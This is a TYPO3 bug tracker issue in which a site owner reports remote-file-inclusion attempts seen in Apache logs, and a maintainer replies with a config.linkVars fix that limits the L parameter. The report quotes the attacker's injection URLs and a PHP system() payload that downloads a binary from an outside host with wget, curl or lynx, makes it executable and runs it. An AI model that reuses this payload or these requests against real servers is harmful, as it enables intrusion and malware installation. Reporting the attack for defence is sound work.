Bug #16549
closed
Attack from abuser.republika.pl
0%
Description
On a 3.8.1 installation a find in the Apache access_log a Entri like:
213.202.240.173 - - [31/Aug/2006:22:09:48 +0200] "GET /index.php?id=http://abuser.republika.pl/test?&&L=5 HTTP/1.1" 200 25709 "-" "-"
213.202.240.173 - - [31/Aug/2006:22:09:49 +0200] "GET /index.php?id=ip_observer&L=http://abuser.republika.pl/test?& HTTP/1.1" 200 39571 "-" "-"
After this request all further requests to my typo3 have in the L variable:
p549caaa9.dip0.t-ipconnect.de - - [02/Sep/2006:00:08:57 +0200] "GET /index.php?id=15&L=http%3A%2F%2Fabuser.republika.pl%2Ftest%3F HTTP/1.1" 200 3494 "http://www.leicht.info/index.php?id=13&L=http%3A%2F%2Fabuser.republika.pl%2Ftest%3F" "Mozilla/5.0 (\
Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418.8 (KHTML, like Gecko) Safari/419.3"
The abuser.republika.pl/test is returning:
echo 'm4k4bra - mamy cie';
system('cd /var/tmp;wget http://abuser.republika.pl/kt2; if [ ! -e ./kt2 ]; then curl http://abuser.republika.pl/kt2 > kt2;fi;if [ ! -e ./kt2 ];then lynx -dump http://abuser.republika.pl/kt2 >kt2; fi; chmod 777 kt2; ./kt2&');
?>
After restart Apache - empty /tmp and block the republika.pl in the .htacces file, i have no attacks again.
But i´m not the only one have this attack.
My Typo3 skills are not deep enough to investigate this correct. Thats why i report.
Christian
(issue imported from #M4193)
Updated by Chris topher over 14 years ago
This is no successful attack, the URLs just look not so beautiful.
Solution is to only allow integers in the L parameter.
See TSRef:
http://typo3.org/documentation/document-library/references/doc_core_tsref/4.3.1/view/1/6/#id2511740
config.linkVars:
Example:
config.linkVars = L, print
This will add "&L=[L-value]&print=[print-value]" to all links in TYPO3.
config.linkVars = L(1-3), print
Same as above, but “&L=[L-value]” will only be added if the current value is 1, 2 or 3.